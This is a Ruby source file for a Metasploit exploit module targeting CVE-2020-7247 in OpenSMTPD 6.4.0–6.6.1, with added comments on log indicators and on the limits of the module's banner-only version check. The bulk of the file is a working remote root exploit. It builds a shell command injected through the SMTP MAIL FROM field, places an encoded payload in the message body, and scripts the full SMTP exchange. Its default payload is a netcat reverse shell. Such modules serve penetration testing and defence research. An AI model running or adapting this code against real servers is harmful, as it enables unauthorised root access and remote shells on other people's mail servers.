Path: blob/master/modules/exploits/unix/smtp/opensmtpd_mail_from_rce.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

# Exploit module for CVE-2020-7247 (see 'References' below).
#
# What the metadata tells a defender: the 'Targets' entry limits the covered
# releases to OpenSMTPD 6.4.0 - 6.6.1; 'Privileged' => true and the
# 'Description' state that the injected command runs as root; and 'Notes'
# flags IOC_IN_LOGS, so attempted or successful runs are expected to leave
# traces on the server — presumably the SMTP envelope values assembled in
# #exploit are the artefacts to look for in the mail log (confirm against
# OpenSMTPD's logging). #check only confirms an OpenSMTPD banner, not the
# affected version range.
class MetasploitModule < Msf::Exploit::Remote

  # Framework reliability ranking; see also the Stability/Reliability 'Notes'
  # registered in #initialize.
  Rank = ExcellentRanking

  # AutoCheck is prepended so the framework can run #check ahead of #exploit
  # (framework behaviour, not visible here). The Tcp and Expect mixins are
  # presumably where connect/disconnect/sock and send_expect come from.
  prepend Msf::Exploit::Remote::AutoCheck
  include Msf::Exploit::Remote::Tcp
  include Msf::Exploit::Remote::Expect

  # Registers the module metadata, the basic options (RPORT, RCPT_TO) and the
  # ExpectTimeout advanced option.
  #
  # @param info [Hash] metadata supplied by the framework, merged via update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'OpenSMTPD MAIL FROM Remote Code Execution',
        'Description' => %q{
          This module exploits a command injection in the MAIL FROM field during
          SMTP interaction with OpenSMTPD to execute a command as the root user.
        },
        'Author' => [
          'Qualys', # Discovery and PoC
          'wvu', # Module
          'RageLtMan <rageltman[at]sempervictus>' # Module
        ],
        'References' => [
          ['CVE', '2020-7247'],
          ['EDB', '48051'], # raptor's LPE/RCE exploit
          ['URL', 'https://seclists.org/oss-sec/2020/q1/40']
        ],
        'DisclosureDate' => '2020-01-28',
        'License' => MSF_LICENSE,
        'Platform' => 'unix',
        'Arch' => ARCH_CMD,
        # The command runs as root (see 'Description').
        'Privileged' => true,
        'Targets' => [
          [
            'OpenSMTPD 6.4.0 - 6.6.1',
            {
              # Characters the MAIL FROM value is compared against in #exploit.
              # That comparison only prints a warning; it does not abort.
              'MyBadChars' => "!\#$%&'*?`{|}~\r\n".chars
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'PAYLOAD' => 'cmd/unix/reverse_netcat'
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          # Declares that runs leave indicators in server logs.
          'SideEffects' => [IOC_IN_LOGS]
        }
      )
    )

    register_options([
      Opt::RPORT(25),
      # Must be a recipient the server accepts; used verbatim in RCPT TO.
      OptString.new('RCPT_TO', [true, 'Valid mail recipient', 'root'])
    ])

    register_advanced_options([
      # Per-step wait used by every send_expect call in #exploit.
      OptFloat.new('ExpectTimeout', [true, 'Timeout for Expect', 3.5])
    ])
  end

  # Banner probe used by AutoCheck.
  #
  # Reads the SMTP greeting and returns CheckCode::Detected when it matches an
  # OpenSMTPD banner. The regex carries no version component, so Detected only
  # means "an OpenSMTPD banner was seen", not that the host is inside the
  # 6.4.0 - 6.6.1 target range. Any other greeting yields Safe; no data or a
  # failed connection yields Unknown.
  #
  # @return [CheckCode] Detected, Safe or Unknown as described above
  def check
    connect
    res = sock.get_once

    return CheckCode::Unknown unless res
    return CheckCode::Detected if res =~ /^220.*ESMTP OpenSMTPD/

    CheckCode::Safe
  rescue EOFError, Rex::ConnectionError => e
    # vprint_error is presumably verbose-only output; the failure is folded
    # into Unknown rather than raised.
    vprint_error(e.message)
    CheckCode::Unknown
  ensure
    disconnect
  end

  # Runs the SMTP dialogue in the order of the `sploit` hash: each key is sent
  # with send_expect and the reply must match the paired pattern before the
  # next line is sent (a nil pattern, used for the body, presumably waits for
  # no reply; a nil key, used first, sends nothing and only expects the 220
  # greeting). Every step is bounded by the ExpectTimeout option. Connection
  # failures and timeouts are reported via fail_with, and the socket is always
  # closed in `ensure`.
  #
  # @raise [Msf::Exploit::Failed] via fail_with on Rex::ConnectionError or Timeout::Error
  def exploit
    # We don't care who we are, so randomize it
    me = rand_text_alphanumeric(8..42)

    # Send mail to this valid recipient
    to = datastore['RCPT_TO']

    # "Comment slide" courtesy of Qualys - brilliant!
    rand_var = rand_text_alpha(1)
    iter = rand_text_alphanumeric(14).chars.join(' ')
    from = ";for #{rand_var} in #{iter};do read #{rand_var};done;sh;exit 0;"

    # Check against RFC 5321, even though OpenSMTPD is more permissive
    # (warning only; the module continues regardless).
    if from.length > 64
      print_warning('MAIL FROM field is greater than 64 chars')
    end

    # Check for badchars, even though there shouldn't be any
    # (compares against the target's 'MyBadChars'; warning only).
    if (badchars = (from.chars & target['MyBadChars'])).any?
      print_warning("MAIL FROM field has badchars: #{badchars}")
    end

    # Create the mail body with comment slide and payload
    body = "\r\n#{"#\r\n" * 14}#{payload.encoded}"

    # Request => expected-reply pairs, consumed in insertion order below.
    sploit = {
      nil => /220.*OpenSMTPD/,
      "HELO #{me}" => /250.*pleased to meet you/,
      "MAIL FROM:<#{from}>" => /250.*Ok/,
      "RCPT TO:<#{to}>" => /250.*Recipient ok/,
      'DATA' => /354 Enter mail.*itself/,
      body => nil,
      '.' => /250.*Message accepted for delivery/,
      'QUIT' => /221.*Bye/
    }

    print_status('Connecting to OpenSMTPD')
    connect

    print_status('Saying hello and sending exploit')
    sploit.each do |line, pattern|
      send_expect(
        line,
        pattern,
        sock: sock,
        newline: "\r\n",
        timeout: datastore['ExpectTimeout']
      )
    end
  rescue Rex::ConnectionError => e
    fail_with(Failure::Unreachable, e.message)
  rescue Timeout::Error => e
    fail_with(Failure::TimeoutExpired, e.message)
  ensure
    disconnect
  end

end